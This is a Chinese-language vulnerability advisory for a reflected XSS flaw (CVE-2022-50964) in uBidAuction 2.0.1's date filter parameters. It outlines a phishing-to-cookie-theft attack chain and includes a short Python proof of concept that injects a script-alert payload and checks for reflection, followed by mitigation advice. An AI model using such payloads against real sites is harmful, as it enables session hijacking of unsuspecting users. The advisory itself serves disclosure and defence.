CVE-2022-50964 uBidAuction反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50964

漏洞类型

XSS (跨站脚本)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

uBidAuction

漏洞概述

uBidAuction 2.0.1版本的筛选模块存在反射型XSS漏洞。由于对date_created等参数缺乏清理，攻击者可构造恶意链接诱导受害者点击，从而在受害者浏览器中执行任意脚本。

技术细节

该漏洞位于uBidAuction的`auctions/myAuctions/status/loose`模块中。问题根源在于应用程序未对`date_created`、`date_from`、`date_to`及`created_at`等GET请求参数进行充分的输入验证和输出编码。攻击者可以利用这一缺陷，将包含JavaScript代码的Payload注入到URL参数中。当服务器处理该请求时，会将恶意脚本直接反射回响应页面。一旦受害者访问该特定URL，浏览器便会解析并执行注入的脚本，导致Cookie窃取、会话劫持或其他客户端攻击。

攻击链分析

STEP 1

侦察与定位

攻击者识别目标正在使用uBidAuction 2.0.1，并确认存在auctions/myAuctions/status/loose接口。

STEP 2

构造载荷

攻击者针对date_from等未经过滤的参数，编写包含恶意JavaScript代码的URL链接。

STEP 3

传递链接

攻击者通过钓鱼邮件或社交媒体将包含恶意Payload的URL发送给受害者。

STEP 4

执行攻击

受害者点击链接，服务器将未转义的脚本返回给浏览器，浏览器执行代码。

STEP 5

窃取数据

攻击者的脚本在受害者浏览器上下文中运行，窃取Session Cookie或敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2022-50964
# Target: uBidAuction 2.0.1
target = "http://example.com/auctions/myAuctions/status/loose"

# Vulnerable parameters: date_created, date_from, date_to, created_at
payload = "<script>alert('XSS')</script>"

params = {
    "date_from": payload
}

response = requests.get(target, params=params)

if payload in response.text:
    print("[+] Vulnerability confirmed! Payload reflected in response.")
else:
    print("[-] Vulnerability not detected or patched.")

影响范围

uBidAuction 2.0.1

防御指南

临时缓解措施

在服务器端对所有日期参数（如date_from、date_to）进行严格的格式校验，确保只接受合法的日期格式。同时，在渲染页面时，对所有动态内容进行HTML编码处理，防止浏览器将用户输入误解析为HTML或JavaScript代码。